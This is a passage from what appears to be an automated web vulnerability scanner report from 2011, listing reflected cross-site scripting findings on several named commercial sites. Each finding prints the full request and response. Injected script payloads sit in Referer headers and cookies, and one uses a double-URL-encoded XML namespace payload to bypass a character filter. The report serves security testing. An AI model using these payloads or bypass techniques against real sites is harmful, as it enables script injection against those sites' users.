The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 571e9"><script>alert(1)</script>08b173422de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /games.html?type=top_rated&mode=top&page_type=games&om_act=convert&om_clk=subnav&tag=subnav%3Btop_games HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=571e9"><script>alert(1)</script>08b173422de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:48:04 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:48:04 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:48:04 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 71260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
054&onid=39&PD=0&xref=http%3A%2F%2Fwww.google.com%2Fsearch&_unsafe_xref=http://www.google.com/search&xrq=hl%3Den%26q%3D571e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E08b173422de&_unsafe_xrq=hl=en&q=571e9"><script>alert(1)</script>08b173422de&edid=107&ts=1303948084&oid=6054-39_6-0-0&ld=www.gamespot.com&clgf=Cg8JIk24ijttAAAASDs&globid=&url=http%3A%2F%2Fwww.gamespot.com%2Fgames.html%3Ftype%3Dtop_rated%26mode%3Dtop%26page_type%3Dgames%26om_ac
...[SNIP]...

3.833. https://www.issa.org/Members/Log-In.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.issa.org
Path:	/Members/Log-In.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d317d"><script>alert(1)</script>336b8be2a36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Members/Log-In.php HTTP/1.1
Host: www.issa.org
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=d317d"><script>alert(1)</script>336b8be2a36
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=58bc1c5fb54b2663fa52961484237ae2; cookiecheck=issa

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta nam
...[SNIP]...
<input type="hidden" name="d" value="http://www.google.com/search?hl=en&q=d317d"><script>alert(1)</script>336b8be2a36">
...[SNIP]...

3.834. http://www.metacritic.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.metacritic.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac90"><a>45e2a93ff17 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.metacritic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolcn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; geolcl=MTczLjE5My4yMTQuMjQzOjA1NjcyfFN0b3dl; ctk=NGRiODkwZWZhZGMxZDZmMzZhMmEyNWQ2MzYyNg%3D%3D; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; MADTEST=1; mad_rsi_segs=ASK05540_10066; XCLGFbrowser=Cg8JIk24ijttAAAASDs
Referer: 9ac90"><a>45e2a93ff17

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:38:35 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolcl=MTczLjE5My4yMTQuMjQzOjA1NjcyfFN0b3dl; expires=Fri, 27-May-2011 23:38:35 GMT; path=/; domain=.metacritic.com
Cneonction: close
Content-Length: 151756
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Metacritic - Movie Reviews, TV Reviews, Game Reviews, and Music Reviews</title>
<meta
...[SNIP]...
/adlog.com.com/adlog/i/r=18359&sg=1815&o=1%253A&h=cn&p=&b=21&l=&site=50&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e3:4DB85A3B598F02&orh=9ac90"><a>45e2a93ff17&ort=&oepartner=&epartner=&ppartner=&pdom=9ac90">
...[SNIP]...

3.835. http://www.metacritic.com/games/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.metacritic.com
Path:	/games/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4da43"><a>c272e0cb29b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /games/ HTTP/1.1
Host: www.metacritic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 4da43"><a>c272e0cb29b

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:59:16 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolcn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 21:59:16 GMT; path=/; domain=.metacritic.com
Set-Cookie: geolcl=MTczLjE5My4yMTQuMjQzOjA1NjcyfFN0b3dl; expires=Fri, 27-May-2011 21:59:16 GMT; path=/; domain=.metacritic.com
Set-Cookie: ctk=NGRiODkxYjRhZGMxZDZmM2I4NmFkMzU4OGRmYQ%3D%3D; expires=Mon, 24-Oct-2011 21:59:16 GMT; path=/; domain=.metacritic.com
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 21:59:16 GMT; path=/; domain=.metacritic.com
Cneonction: close
Content-Length: 85361
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Video Game Reviews, Articles, Trailers and more at Metacritic</title>
<meta name="des
...[SNIP]...
.com/adlog/i/r=15115&sg=456052&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=00c13-ad-e7:4DB8339E6A1961&orh=4da43"><a>c272e0cb29b&ort=&oepartner=&epartner=&ppartner=&pdom=4da43">
...[SNIP]...

3.836. http://www.tv.com/shows/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tv.com
Path:	/shows/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed1e4"><a>2049fbe23c7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shows/?tag=nav_top;shows HTTP/1.1
Host: www.tv.com
Proxy-Connection: keep-alive
Referer: ed1e4"><a>2049fbe23c7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo4NDA%3D; ab_test=B; tv_interstitial=1; tv_stats=d41d8cd98f00b204e9800998ecf8427e; MAD_SESSION=c; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=141309943.1303947442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=141309943.1481421202.1303947442.1303947442.1303947442.1; __utmc=141309943; __utmb=141309943.1.10.1303947442; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDs; base_domain_9ecec4fd9dbc407e5d9b83aa0eb89270=tv.com; fbsetting_9ecec4fd9dbc407e5d9b83aa0eb89270=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:45:18 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: tv_interstitial=2; expires=Thu, 28-Apr-2011 23:45:18 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 132268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
.com/adlog/e/r=10911&sg=511695&o=10908%253A&h=cn&p=&b=16&l=&site=45&pt=6136&nd=10908&pid=&cid=&pp=100&e=&rqid=00c13-ad-e6:4DB8889726614B&orh=ed1e4"><a>2049fbe23c7&oepartner=&epartner=&ppartner=&pdom=ed1e4">
...[SNIP]...

3.837. http://moneywatch.bnet.com/ [XCLGFbrowser cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneywatch.bnet.com
Path:	/

Issue detail

The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8916f</script><script>alert(1)</script>3d7bb3ebf98 was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: moneywatch.bnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; __csref=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20057854-503544.html%3Ftag%3Dstrip; __cst=83114897b6b32000; __csv=6522d442e56f04a6|0; __csnv=444b4dee8b116496; __ctl=6522d442e56f04a61; XCLGFbrowser=Cg8JIk24ijttAAAASDs8916f</script><script>alert(1)</script>3d7bb3ebf98; MAD_FIRSTPAGE=0; reg-overlay=1; __utmz=243208273.1303947369.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243208273.1852203933.1303947369.1303947369.1303947369.1; __utmc=243208273; __utmb=243208273.1.10.1303947369; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:37:30 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 81904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
avascript';
cs.async = true;
cs.src = ('https:' == document.location.protocol?'https://':'http://')+'static.crowdscience.com/start-c2e7cdddce.js?cp0=[Cg8JIk24ijttAAAASDs8916f</script><script>alert(1)</script>3d7bb3ebf98]&cp1=[7J3L-QoPOB4AAFT106AAAAAW]';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(cs,s);
})();
</script>
...[SNIP]...

3.838. http://moneywatch.bnet.com/money-library/ [XCLGFbrowser cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneywatch.bnet.com
Path:	/money-library/

Issue detail

The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23759</script><script>alert(1)</script>3894d82377b was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /money-library/?tag=nav;n-moneyLibrary HTTP/1.1
Host: moneywatch.bnet.com
Proxy-Connection: keep-alive
Referer: http://moneywatch.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; __csref=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20057854-503544.html%3Ftag%3Dstrip; XCLGFbrowser=Cg8JIk24ijttAAAASDs23759</script><script>alert(1)</script>3894d82377b; MAD_FIRSTPAGE=0; reg-overlay=1; __cst=83114897b6b32000; __csv=6522d442e56f04a6|0; __csnv=99f1e31378d3bbd8; __ctl=6522d442e56f04a61; __utmz=243208273.1303947475.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243208273.1169385470.1303947475.1303947475.1303947475.1; __utmc=243208273; __utmb=243208273.1.10.1303947475; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265&ASK05540_10249&ASK05540_10263

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:04 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 67957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
avascript';
cs.async = true;
cs.src = ('https:' == document.location.protocol?'https://':'http://')+'static.crowdscience.com/start-c2e7cdddce.js?cp0=[Cg8JIk24ijttAAAASDs23759</script><script>alert(1)</script>3894d82377b]&cp1=[-OwcnQoPOB4AAGPsq6YAAAAz]';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(cs,s);
})();
</script>
...[SNIP]...

3.839. http://ocp.cbs.com/pacific/Response.jsp [_PACIFIC_COMMENTS cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ocp.cbs.com
Path:	/pacific/Response.jsp

Issue detail

The value of the _PACIFIC_COMMENTS cookie is copied into the XML document as plain text between tags. The payload 987fe%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee0d75a0cfd6 was submitted in the _PACIFIC_COMMENTS cookie. This input was echoed as 987fe<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e0d75a0cfd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the _PACIFIC_COMMENTS cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /pacific/Response.jsp?id=1292013405&c=http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/2/0/%2a/s%3B233620153%3B1-0%3B1%3B62745098%3B780-320/240%3B39802372/39820159/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f&h=http://s0.2mdn.net&n=1156919&i=http://ad.doubleclick.net/imp;v7;/;233620153;1-0;1;62745098;320/240;39802372/39820159/1;;~aopt=2/0/ff/0;~okv=;partner=maxpreps;format=FLV;pos=1;sz=320x240;type=ros;playerVersion=UVPPlayer2.8;session=c;firstpage=0;cookieson=1;feat=frontpage;chan=varsity_center;DVAR_UVP=UVP2.8.0;adv=c;aseg=K05540_10572;aseg=K05540_10573;aseg=K05540_10578;aseg=K05540_10276;aseg=K05540_10066;aseg=K05540_10174;aseg=K05540_10195;aseg=K05540_10225;aseg=K05540_10269;aseg=K05540_10287;aseg=K05540_10290;aseg=K05540_10354;aseg=K05540_10390;aseg=K05540_10391;aseg=K05540_10394;aseg=K05540_10395;aseg=K05540_10537;aseg=K05540_10562;~cs=t%3f&partner=maxpreps HTTP/1.1
Host: ocp.cbs.com
Proxy-Connection: keep-alive
Referer: http://www-content-v3.maxpreps.com.edgesuite.net/includes/flash/universalvideoplayer/bin/videoplayer.20110412.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MAD_PAGESTATE=1%7C11079%7C%3Bmaxpreps.com%3B%3B%7C; JSESSIONID=C284FA5194ACA6B2E51AED37DA638975; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); XCLGFbrowser=Cg8JIk24ijttAAAASDs; CBS_ADV_VAL=c; ABTEST_HOMEPAGE=A; __utma=235293011.1320039961.1303946085.1303946085.1303947395.2; __utmc=235293011; __utmb=235293011.1.10.1303947395; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; playerVersion=UVPPlayer2.8; _PACIFIC_COMMENTS=Ad+System+Call%28ocp.cbs.com%29%3A+http%3A%2F%2Fad.doubleclick.net%2Fad%2Fcans%2Fmaxpreps%3Bpartner%3Dmaxpreps%3Bformat%3DFLV%3Bpos%3D1%3Bsz%3D320x240%3Btype%3Dros%3BplayerVersion%3DUVPPlayer2.8%3Bsession%3Dc%3Bfirstpage%3D0%3Bcookieson%3D1%3Bfeat%3Dfrontpage%3Bchan%3Dvarsity_center%3BDVAR_UVP%3DUVP2.8.0%3Badv%3Dc%3Baseg%3DK05540_10572%3Baseg%3DK05540_10573%3Baseg%3DK05540_10578%3Baseg%3DK05540_10276%3Baseg%3DK05540_10066%3Baseg%3DK05540_10174%3Baseg%3DK05540_10195%3Baseg%3DK05540_10225%3Baseg%3DK05540_10269%3Baseg%3DK05540_10287%3Baseg%3DK05540_10290%3Baseg%3DK05540_10354%3Baseg%3DK05540_10390%3Baseg%3DK05540_10391%3Baseg%3DK05540_10394%3Baseg%3DK05540_10395%3Baseg%3DK05540_10537%3Baseg%3DK05540_10562%3Bord%3D260611%3F987fe%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee0d75a0cfd6; ad_format=FLV; PACIFIC_TRACE=phx1-ad-xw2.cnet.com.13039474579410.6021572753713437; pos=1; PACIFIC_AD_CALL=%2Fvideos.can.com%2Fmaxpreps%3Bpartner%3Dmaxpreps%3Bformat%3DFLV%3Bpos%3D1%3Bsz%3D320x240%3Btype%3Dros%3BplayerVersion%3DUVPPlayer2.8%3Bsession%3Dc%3Bfirstpage%3D0%3Bcookieson%3D1%3Bfeat%3Dfrontpage%3Bchan%3Dvarsity_center%3Bord%3D260611%3B%3BDVAR_UVP%3DUVP2.8.0; xml=vast2; partner=maxpreps

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:56 GMT
Server: Apache-Coyote/1.1
ACCESS-CONTROL-ALLOW-METHODS: POST, GET, OPTIONS
ACCESS-CONTROL-MAX-AGE: 3600
CACHE-CONTROL: NO-CACHE
ACCESS-CONTROL-ALLOW-ORIGIN: *
Content-Type: application/xml;charset=ISO-8859-1
Content-Length: 1828
Set-Cookie: JSESSIONID=FB2B95C62F0FDA789416910448DAACF7; Path=/pacific
Set-Cookie: CBS_CAT_EXCL=1%3A; Domain=.cbs.com; Path=/
Set-Cookie: xml=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: partner=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pos=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ad_format=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sz=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: playerVersion=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
